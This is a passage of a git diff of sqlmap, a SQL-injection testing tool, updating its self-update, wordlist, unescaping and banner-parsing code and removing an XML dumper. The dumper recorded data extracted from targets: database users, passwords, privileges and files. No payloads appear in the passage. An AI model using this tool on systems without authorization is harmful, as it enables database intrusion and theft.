kb.multiThreadMode = False - kb.bruteMode = False kb.threadContinue = True kb.threadException = False + kb.technique = None for lock in kb.locks.values(): - if lock.locked_lock(): - lock.release() + if lock.locked(): + try: + lock.release() + except: + pass if conf.get("hashDB"): - conf.hashDB.flush(True) + conf.hashDB.flush() if cleanupFunction: cleanupFunction() diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py index a7645529299..21588a1892a 100644 --- a/lib/core/unescaper.py +++ b/lib/core/unescaper.py @@ -1,20 +1,16 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend -from lib.core.data import conf from lib.core.datatype import AttribDict from lib.core.settings import EXCLUDE_UNESCAPE class Unescaper(AttribDict): def escape(self, expression, quote=True, dbms=None): - if conf.noEscape: - return expression - if expression is None: return expression @@ -25,10 +21,15 @@ def escape(self, expression, quote=True, dbms=None): identifiedDbms = Backend.getIdentifiedDbms() if dbms is not None: - return self[dbms](expression, quote=quote) - elif identifiedDbms is not None: - return self[identifiedDbms](expression, quote=quote) + retVal = self[dbms](expression, quote=quote) + elif identifiedDbms is not None and identifiedDbms in self: + retVal = self[identifiedDbms](expression, quote=quote) else: - return expression + retVal = expression + + # e.g. inference comparison for ' + retVal = retVal.replace("'''", "''''") + + return retVal unescaper = Unescaper() diff --git a/lib/core/update.py b/lib/core/update.py index 6a55b16a12b..78635ff39d8 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -1,67 +1,171 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import glob import os import re +import shutil +import subprocess import time - -from subprocess import PIPE -from subprocess import Popen as execute +import zipfile from lib.core.common import dataToStdout +from lib.core.common import extractRegexResult +from lib.core.common import getLatestRevision +from lib.core.common import getSafeExString +from lib.core.common import openFile from lib.core.common import pollProcess +from lib.core.common import readInput +from lib.core.convert import getText from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths from lib.core.revision import getRevisionNumber from lib.core.settings import GIT_REPOSITORY from lib.core.settings import IS_WIN +from lib.core.settings import VERSION +from lib.core.settings import TYPE +from lib.core.settings import ZIPBALL_PAGE +from thirdparty.six.moves import urllib as _urllib def update(): if not conf.updateAll: return success = False - rootDir = paths.SQLMAP_ROOT_PATH - if not os.path.exists(os.path.join(rootDir, ".git")): - errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)" - logger.error(errMsg) + if TYPE == "pip": + infoMsg = "updating sqlmap to the latest stable version from the " + infoMsg += "PyPI repository" + logger.info(infoMsg) + + debugMsg = "sqlmap will try to update itself using 'pip' command" + logger.debug(debugMsg) + + dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X")) + + output = "" + try: + process = subprocess.Popen("pip install -U sqlmap", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH) + pollProcess(process, True) + output, _ = process.communicate() + success = not process.returncode + except Exception as ex: + success = False + output = getSafeExString(ex) + finally: + output = getText(output) + + if success: + logger.info("%s the latest revision '%s'" % ("already at" if "already up-to-date" in output else "updated to", extractRegexResult(r"\binstalled sqlmap-(?P\d+\.\d+\.\d+)", output) or extractRegexResult(r"\((?P\d+\.\d+\.\d+)\)", output))) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"[^a-z0-9:/\\]+", " ", output).strip()) + + elif not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): + warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository " + warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY + logger.warning(warnMsg) + + if VERSION == getLatestRevision(): + logger.info("already at the latest revision '%s'" % (getRevisionNumber() or VERSION)) + return + + message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" + if readInput(message, default='N', boolean=True): + directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) + + try: + open(os.path.join(directory, "sqlmap.py"), "w+b") + except Exception as ex: + errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex)) + logger.error(errMsg) + else: + attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode + for wildcard in ('*', ".*"): + for _ in glob.glob(os.path.join(directory, wildcard)): + try: + if os.path.isdir(_): + shutil.rmtree(_) + else: + os.remove(_) + except: + pass + + if glob.glob(os.path.join(directory, '*')): + errMsg = "unable to clear the content of directory '%s'" % directory + logger.error(errMsg) + else: + try: + archive = _urllib.request.urlretrieve(ZIPBALL_PAGE)[0] + + with zipfile.ZipFile(archive) as f: + for info in f.infolist(): + info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename) + if info.filename: + f.extract(info, directory) + + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py") + if os.path.isfile(filepath): + with openFile(filepath, "r") as f: + version = re.search(r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1) + logger.info("updated to the latest version '%s#dev'" % version) + success = True + except Exception as ex: + logger.error("update could not be completed ('%s')" % getSafeExString(ex)) + else: + if not success: + logger.error("update could not be completed") + else: + try: + os.chmod(os.path.join(directory, "sqlmap.py"), attrs) + except OSError: + logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py")) + else: - infoMsg = "updating sqlmap to the latest development version from the " + infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" logger.info(infoMsg) debugMsg = "sqlmap will try to update itself using 'git' command" logger.debug(debugMsg) - dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) - process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE) - pollProcess(process, True) - stdout, stderr = process.communicate() - success = not process.returncode + dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X")) + + output = "" + try: + process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH) + pollProcess(process, True) + output, _ = process.communicate() + success = not process.returncode + except Exception as ex: + success = False + output = getSafeExString(ex) + finally: + output = getText(output) if success: - import lib.core.settings - _ = lib.core.settings.REVISION = getRevisionNumber() - logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) + logger.info("%s the latest revision '%s'" % ("already at" if "Already" in output else "updated to", getRevisionNumber())) else: - logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) + if "Not a git repository" in output: + errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " + errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY + logger.error(errMsg) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", output).strip()) if not success: if IS_WIN: infoMsg = "for Windows platform it's recommended " infoMsg += "to use a GitHub for Windows client for updating " - infoMsg += "purposes (http://windows.github.com/) or just " + infoMsg += "purposes (https://desktop.github.com/) or just " infoMsg += "download the latest snapshot from " - infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads" + infoMsg += "https://github.com/sqlmapproject/sqlmap/releases" else: - infoMsg = "for Linux platform it's required " - infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')" + infoMsg = "for Linux platform it's recommended " + infoMsg += "to install a standard 'git' package (e.g.: 'apt install git')" logger.info(infoMsg) diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py index b18f7c46beb..1bb8e42bf2f 100644 --- a/lib/core/wordlist.py +++ b/lib/core/wordlist.py @@ -1,26 +1,36 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import os import zipfile +from lib.core.common import getSafeExString +from lib.core.common import isZipFile from lib.core.exception import SqlmapDataException -from lib.core.settings import UNICODE_ENCODING +from lib.core.exception import SqlmapInstallationException +from thirdparty import six -class Wordlist(object): +class Wordlist(six.Iterator): """ Iterator for looping over a large dictionaries + + >>> from lib.core.option import paths + >>> isinstance(next(Wordlist(paths.SMALL_DICT)), six.binary_type) + True + >>> isinstance(next(Wordlist(paths.WORDLIST)), six.binary_type) + True """ def __init__(self, filenames, proc_id=None, proc_count=None, custom=None): - self.filenames = filenames + self.filenames = [filenames] if isinstance(filenames, six.string_types) else filenames self.fp = None + self.zip_file = None self.index = 0 self.counter = -1 + self.current = None self.iter = None self.custom = custom or [] self.proc_id = proc_id @@ -33,19 +43,25 @@ def __iter__(self): def adjust(self): self.closeFP() if self.index > len(self.filenames): - raise StopIteration + return # Note: https://stackoverflow.com/a/30217723 (PEP 479) elif self.index == len(self.filenames): self.iter = iter(self.custom) else: - current = self.filenames[self.index] - if os.path.splitext(current)[1].lower() == ".zip": - _ = zipfile.ZipFile(current, 'r') - if len(_.namelist()) == 0: - errMsg = "no file(s) inside '%s'" % current + self.current = self.filenames[self.index] + if isZipFile(self.current): + try: + self.zip_file = zipfile.ZipFile(self.current, 'r') + except zipfile.error as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + if len(self.zip_file.namelist()) == 0: + errMsg = "no file(s) inside '%s'" % self.current raise SqlmapDataException(errMsg) - self.fp = _.open(_.namelist()[0]) + self.fp = self.zip_file.open(self.zip_file.namelist()[0]) else: - self.fp = open(current, 'r') + self.fp = open(self.current, "rb") self.iter = iter(self.fp) self.index += 1 @@ -55,19 +71,24 @@ def closeFP(self): self.fp.close() self.fp = None - def next(self): + if self.zip_file: + self.zip_file.close() + self.zip_file = None + + def __next__(self): retVal = None while True: self.counter += 1 try: - retVal = self.iter.next().rstrip() + retVal = next(self.iter).rstrip() + except zipfile.error as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) except StopIteration: self.adjust() - retVal = self.iter.next().rstrip() - try: - retVal = retVal.decode(UNICODE_ENCODING) - except UnicodeDecodeError: - continue + retVal = next(self.iter).rstrip() if not self.proc_count or self.counter % self.proc_count == self.proc_id: break return retVal diff --git a/lib/core/xmldump.py b/lib/core/xmldump.py deleted file mode 100644 index 83525c07bf4..00000000000 --- a/lib/core/xmldump.py +++ /dev/null @@ -1,536 +0,0 @@ -#!/usr/bin/env python - -import codecs -import os -import re -import xml - -import xml.sax.saxutils as saxutils - -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapFilePathException -from lib.core.settings import UNICODE_ENCODING -from thirdparty.prettyprint import prettyprint -from xml.dom.minidom import Document -from xml.parsers.expat import ExpatError - -TECHNIC_ELEM_NAME = "Technic" -TECHNICS_ELEM_NAME = "Technics" -BANNER_ELEM_NAME = "Banner" -COLUMNS_ELEM_NAME = "DatabaseColumns" -COLUMN_ELEM_NAME = "Column" -CELL_ELEM_NAME = "Cell" -COLUMN_ATTR = "column" -ROW_ELEM_NAME = "Row" -TABLES_ELEM_NAME = "tables" -DATABASE_COLUMNS_ELEM = "DB" -DB_TABLES_ELEM_NAME = "DBTables" -DB_TABLE_ELEM_NAME = "DBTable" -IS_DBA_ELEM_NAME = "isDBA" -FILE_CONTENT_ELEM_NAME = "FileContent" -DB_ATTR = "db" -UNKNOWN_COLUMN_TYPE = "unknown" -USER_SETTINGS_ELEM_NAME = "UserSettings" -USER_SETTING_ELEM_NAME = "UserSetting" -USERS_ELEM_NAME = "Users" -USER_ELEM_NAME = "User" -DB_USER_ELEM_NAME = "DBUser" -SETTINGS_ELEM_NAME = "Settings" -DBS_ELEM_NAME = "DBs" -DB_NAME_ELEM_NAME = "DBName" -DATABASE_ELEM_NAME = "Database" -TABLE_ELEM_NAME = "Table" -DB_TABLE_VALUES_ELEM_NAME = "DBTableValues" -DB_VALUES_ELEM = "DBValues" -QUERIES_ELEM_NAME = "Queries" -QUERY_ELEM_NAME = "Query" -REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries" -REGISTER_DATA_ELEM_NAME = "RegisterData" -DEFAULT_DB = "All" -MESSAGE_ELEM = "Message" -MESSAGES_ELEM_NAME = "Messages" -ERROR_ELEM_NAME = "Error" -LST_ELEM_NAME = "List" -LSTS_ELEM_NAME = "Lists" -CURRENT_USER_ELEM_NAME = "CurrentUser" -CURRENT_DB_ELEM_NAME = "CurrentDB" -MEMBER_ELEM = "Member" -ADMIN_USER = "Admin" -REGULAR_USER = "User" -STATUS_ELEM_NAME = "Status" -RESULTS_ELEM_NAME = "Results" -UNHANDLED_PROBLEM_TYPE = "Unhandled" -NAME_ATTR = "name" -TYPE_ATTR = "type" -VALUE_ATTR = "value" -SUCESS_ATTR = "success" -NAME_SPACE_ATTR = 'http://www.w3.org/2001/XMLSchema-instance' -XMLNS_ATTR = "xmlns:xsi" -SCHEME_NAME = "sqlmap.xsd" -SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation" -CHARACTERS_TO_ENCODE = range(32) + range(127, 256) -ENTITIES = {'"': '"', "'": "'"} - -class XMLDump(object): - ''' - This class purpose is to dump the data into an xml Format. - The format of the xml file is described in the scheme file xml/sqlmap.xsd - ''' - - def __init__(self): - self._outputFile = None - self._outputFP = None - self.__root = None - self.__doc = Document() - - def _addToRoot(self, element): - ''' - Adds element to the root element - ''' - self.__root.appendChild(element) - - def __write(self, data, n=True): - ''' - Writes the data into the file - ''' - if n: - self._outputFP.write("%s\n" % data) - else: - self._outputFP.write("%s " % data) - - self._outputFP.flush() - - kb.dataOutputFlag = True - - def _getRootChild(self, elemName): - ''' - Returns the child of the root with the described name - ''' - elements = self.__root.getElementsByTagName(elemName) - if elements: - return elements[0] - - return elements - - def _createTextNode(self, data): - ''' - Creates a text node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - if data is None: - return self.__doc.createTextNode(u'') - else: - escaped_data = saxutils.escape(data, ENTITIES) - return self.__doc.createTextNode(escaped_data) - - def _createAttribute(self, attrName, attrValue): - ''' - Creates an attribute node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - attr = self.__doc.createAttribute(attrName) - if attrValue is None: - attr.nodeValue = u'' - else: - attr.nodeValue = getUnicode(attrValue) - return attr - - def string(self, header, data, sort=True): - ''' - Adds string element to the xml. - ''' - if isinstance(data, (list, tuple, set)): - self.lister(header, data, sort) - return - - messagesElem = self._getRootChild(MESSAGES_ELEM_NAME) - if (not(messagesElem)): - messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME) - self._addToRoot(messagesElem) - - if data: - data = self._formatString(data) - else: - data = "" - - elem = self.__doc.createElement(MESSAGE_ELEM) - elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - elem.appendChild(self._createTextNode(data)) - messagesElem.appendChild(elem) - - def lister(self, header, elements, sort=True): - ''' - Adds information formatted as list element - ''' - lstElem = self.__doc.createElement(LST_ELEM_NAME) - lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - if elements: - if sort: - try: - elements = set(elements) - elements = list(elements) - elements.sort(key=lambda x: x.lower()) - except: - pass - - for element in elements: - memberElem = self.__doc.createElement(MEMBER_ELEM) - lstElem.appendChild(memberElem) - if isinstance(element, basestring): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElem.appendChild(self._createTextNode(element)) - elif isinstance(element, (list, tuple, set)): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list")) - for e in element: - memberElemStr = self.__doc.createElement(MEMBER_ELEM) - memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElemStr.appendChild(self._createTextNode(getUnicode(e))) - memberElem.appendChild(memberElemStr) - listsElem = self._getRootChild(LSTS_ELEM_NAME) - if not(listsElem): - listsElem = self.__doc.createElement(LSTS_ELEM_NAME) - self._addToRoot(listsElem) - listsElem.appendChild(lstElem) - - def technic(self, technicType, data): - ''' - Adds information about the technic used to extract data from the db - ''' - technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME) - technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType)) - textNode = self._createTextNode(data) - technicElem.appendChild(textNode) - technicsElem = self._getRootChild(TECHNICS_ELEM_NAME) - if not(technicsElem): - technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME) - self._addToRoot(technicsElem) - technicsElem.appendChild(technicElem) - - def banner(self, data): - ''' - Adds information about the database banner to the xml. - The banner contains information about the type and the version of the database. - ''' - bannerElem = self.__doc.createElement(BANNER_ELEM_NAME) - bannerElem.appendChild(self._createTextNode(data)) - self._addToRoot(bannerElem) - - def currentUser(self, data): - ''' - Adds information about the current database user to the xml - ''' - currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME) - textNode = self._createTextNode(data) - currentUserElem.appendChild(textNode) - self._addToRoot(currentUserElem) - - def currentDb(self, data): - ''' - Adds information about the current database is use to the xml - ''' - currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME) - textNode = self._createTextNode(data) - currentDBElem.appendChild(textNode) - self._addToRoot(currentDBElem) - - def dba(self, isDBA): - ''' - Adds information to the xml that indicates whether the user has DBA privileges - ''' - isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME) - isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA))) - self._addToRoot(isDBAElem) - - def users(self, users): - ''' - Adds a list of the existing users to the xml - ''' - usersElem = self.__doc.createElement(USERS_ELEM_NAME) - if isinstance(users, basestring): - users = [users] - if users: - for user in users: - userElem = self.__doc.createElement(DB_USER_ELEM_NAME) - usersElem.appendChild(userElem) - userElem.appendChild(self._createTextNode(user)) - self._addToRoot(usersElem) - - def dbs(self, dbs): - ''' - Adds a list of the existing databases to the xml - ''' - dbsElem = self.__doc.createElement(DBS_ELEM_NAME) - if dbs: - for db in dbs: - dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME) - dbsElem.appendChild(dbElem) - dbElem.appendChild(self._createTextNode(db)) - self._addToRoot(dbsElem) - - def userSettings(self, header, userSettings, subHeader): - ''' - Adds information about the user's settings to the xml. - The information can be user's passwords, privileges and etc.. - ''' - self._areAdmins = set() - userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME) - if (not(userSettingsElem)): - userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME) - self._addToRoot(userSettingsElem) - - userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME) - userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - - if isinstance(userSettings, (tuple, list, set)): - self._areAdmins = userSettings[1] - userSettings = userSettings[0] - - users = userSettings.keys() - users.sort(key=lambda x: x.lower()) - - for user in users: - userElem = self.__doc.createElement(USER_ELEM_NAME) - userSettingElem.appendChild(userElem) - if user in self._areAdmins: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER)) - else: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER)) - - settings = userSettings[user] - - settings.sort() - - for setting in settings: - settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME) - settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader)) - settingTextNode = self._createTextNode(setting) - settingsElem.appendChild(settingTextNode) - userElem.appendChild(settingsElem) - userSettingsElem.appendChild(userSettingElem) - - def dbTables(self, dbTables): - ''' - Adds information of the existing db tables to the xml - ''' - if not isinstance(dbTables, dict): - self.string(TABLES_ELEM_NAME, dbTables) - return - - dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME) - - for db, tables in dbTables.items(): - tables.sort(key=lambda x: x.lower()) - dbElem = self.__doc.createElement(DATABASE_ELEM_NAME) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - dbTablesElem.appendChild(dbElem) - for table in tables: - tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME) - tableElem.appendChild(self._createTextNode(table)) - dbElem.appendChild(tableElem) - self._addToRoot(dbTablesElem) - - def dbTableColumns(self, tableColumns): - ''' - Adds information about the columns of the existing tables to the xml - ''' - - columnsElem = self._getRootChild(COLUMNS_ELEM_NAME) - if not(columnsElem): - columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME) - - for db, tables in tableColumns.items(): - if not db: - db = DEFAULT_DB - dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - columnsElem.appendChild(dbElem) - - for table, columns in tables.items(): - tableElem = self.__doc.createElement(TABLE_ELEM_NAME) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - colList = columns.keys() - colList.sort(key=lambda x: x.lower()) - - for column in colList: - colType = columns[column] - colElem = self.__doc.createElement(COLUMN_ELEM_NAME) - if colType is not None: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType)) - else: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE)) - colElem.appendChild(self._createTextNode(column)) - tableElem.appendChild(colElem) - - self._addToRoot(columnsElem) - - def dbTableValues(self, tableValues): - ''' - Adds the values of specific table to the xml. - The values are organized according to the relevant row and column. - ''' - tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME) - if (tableValues is not None): - db = tableValues["__infos__"]["db"] - if not db: - db = "All" - table = tableValues["__infos__"]["table"] - - count = int(tableValues["__infos__"]["count"]) - columns = tableValues.keys() - columns.sort(key=lambda x: x.lower()) - - tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db)) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - for i in range(count): - rowElem = self.__doc.createElement(ROW_ELEM_NAME) - tableElem.appendChild(rowElem) - for column in columns: - if column != "__infos__": - info = tableValues[column] - value = info["values"][i] - - if re.search("^[\ *]*$", value): - value = "NULL" - - cellElem = self.__doc.createElement(CELL_ELEM_NAME) - cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column)) - cellElem.appendChild(self._createTextNode(value)) - rowElem.appendChild(cellElem) - - dbValuesElem = self._getRootChild(DB_VALUES_ELEM) - if (not(dbValuesElem)): - dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM) - self._addToRoot(dbValuesElem) - - dbValuesElem.appendChild(tableElem) - - logger.info("Table '%s.%s' dumped to XML file" % (db, table)) - - def dbColumns(self, dbColumns, colConsider, dbs): - ''' - Adds information about the columns - ''' - for column in dbColumns.keys(): - printDbs = {} - for db, tblData in dbs.items(): - for tbl, colData in tblData.items(): - for col, dataType in colData.items(): - if column in col: - if db in printDbs: - if tbl in printDbs[db]: - printDbs[db][tbl][col] = dataType - else: - printDbs[db][tbl] = {col: dataType} - else: - printDbs[db] = {} - printDbs[db][tbl] = {col: dataType} - - continue - - self.dbTableColumns(printDbs) - - def query(self, query, queryRes): - ''' - Adds details of an executed query to the xml. - The query details are the query itself and it's results. - ''' - queryElem = self.__doc.createElement(QUERY_ELEM_NAME) - queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query)) - queryElem.appendChild(self._createTextNode(queryRes)) - queriesElem = self._getRootChild(QUERIES_ELEM_NAME) - if (not(queriesElem)): - queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME) - self._addToRoot(queriesElem) - queriesElem.appendChild(queryElem) - - def registerValue(self, registerData): - ''' - Adds information about an extracted registry key to the xml - ''' - registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME) - registerElem.appendChild(self._createTextNode(registerData)) - registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME) - if (not(registriesElem)): - registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME) - self._addToRoot(registriesElem) - registriesElem.appendChild(registerElem) - - def rFile(self, filePath, data): - ''' - Adds an extracted file's content to the xml - ''' - fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME) - fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath)) - fileContentElem.appendChild(self._createTextNode(data)) - self._addToRoot(fileContentElem) - - def setOutputFile(self): - ''' - Initiates the xml file from the configuration. - ''' - if (conf.xmlFile): - try: - self._outputFile = conf.xmlFile - self.__root = None - - if os.path.exists(self._outputFile): - try: - self.__doc = xml.dom.minidom.parse(self._outputFile) - self.__root = self.__doc.childNodes[0] - except ExpatError: - self.__doc = Document() - - self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING) - - if self.__root is None: - self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME) - self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR)) - self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME)) - self.__doc.appendChild(self.__root) - except IOError: - raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile) - - def getOutputFile(self): - return self._outputFile - - def finish(self, resultStatus, resultMsg=""): - ''' - Finishes the dumper operation: - 1. Adds the session status to the xml - 2. Writes the xml to the file - 3. Closes the xml file - ''' - if ((self._outputFP is not None) and not(self._outputFP.closed)): - statusElem = self.__doc.createElement(STATUS_ELEM_NAME) - statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus))) - - if not resultStatus: - errorElem = self.__doc.createElement(ERROR_ELEM_NAME) - - if isinstance(resultMsg, Exception): - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__)) - else: - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE)) - - errorElem.appendChild(self._createTextNode(getUnicode(resultMsg))) - statusElem.appendChild(errorElem) - - self._addToRoot(statusElem) - self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING)) - self._outputFP.close() - - -def closeDumper(status, msg=""): - """ - Closes the dumper of the session - """ - - if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"): - conf.dumper.finish(status, msg) - -dumper = XMLDump() diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/parse/__init__.py +++ b/lib/parse/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/parse/banner.py b/lib/parse/banner.py index be6ffa9ca56..c4eef8c274c 100644 --- a/lib/parse/banner.py +++ b/lib/parse/banner.py @@ -1,15 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from xml.sax.handler import ContentHandler -from lib.core.common import checkFile from lib.core.common import Backend from lib.core.common import parseXmlFile from lib.core.common import sanitizeStr @@ -27,7 +26,7 @@ class MSSQLBannerHandler(ContentHandler): def __init__(self, banner, info): ContentHandler.__init__(self) - self._banner = sanitizeStr(banner) + self._banner = sanitizeStr(banner or "") self._inVersion = False self._inServicePack = False self._release = None @@ -54,16 +53,16 @@ def startElement(self, name, attrs): elif name == "servicepack": self._inServicePack = True - def characters(self, data): + def characters(self, content): if self._inVersion: - self._version += sanitizeStr(data) + self._version += sanitizeStr(content) elif self._inServicePack: - self._servicePack += sanitizeStr(data) + self._servicePack += sanitizeStr(content) def endElement(self, name): if name == "signature": for version in (self._version, self._versionAlt): - if version and re.search(r" %s[\.\ ]+" % version, self._banner): + if version and self._banner and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner): self._feedInfo("dbmsRelease", self._release) self._feedInfo("dbmsVersion", self._version) self._feedInfo("dbmsServicePack", self._servicePack) @@ -104,8 +103,6 @@ def bannerParser(banner): if not xmlfile: return - checkFile(xmlfile) - if Backend.isDbms(DBMS.MSSQL): handler = MSSQLBannerHandler(banner, kb.bannerFp) parseXmlFile(xmlfile, handler) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 2cabc112b32..ffba577c24e 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -1,779 +1,1143 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + +import os +import re +import shlex import sys -from optparse import OptionError -from optparse import OptionGroup -from optparse import OptionParser -from optparse import SUPPRESS_HELP +try: + from optparse import OptionError as ArgumentError + from optparse import OptionGroup + from optparse import OptionParser as ArgumentParser + from optparse import SUPPRESS_HELP as SUPPRESS + + ArgumentParser.add_argument = ArgumentParser.add_option + + def _add_argument_group(self, *args, **kwargs): + return self.add_option_group(OptionGroup(self, *args, **kwargs)) + + ArgumentParser.add_argument_group = _add_argument_group + + def _add_argument(self, *args, 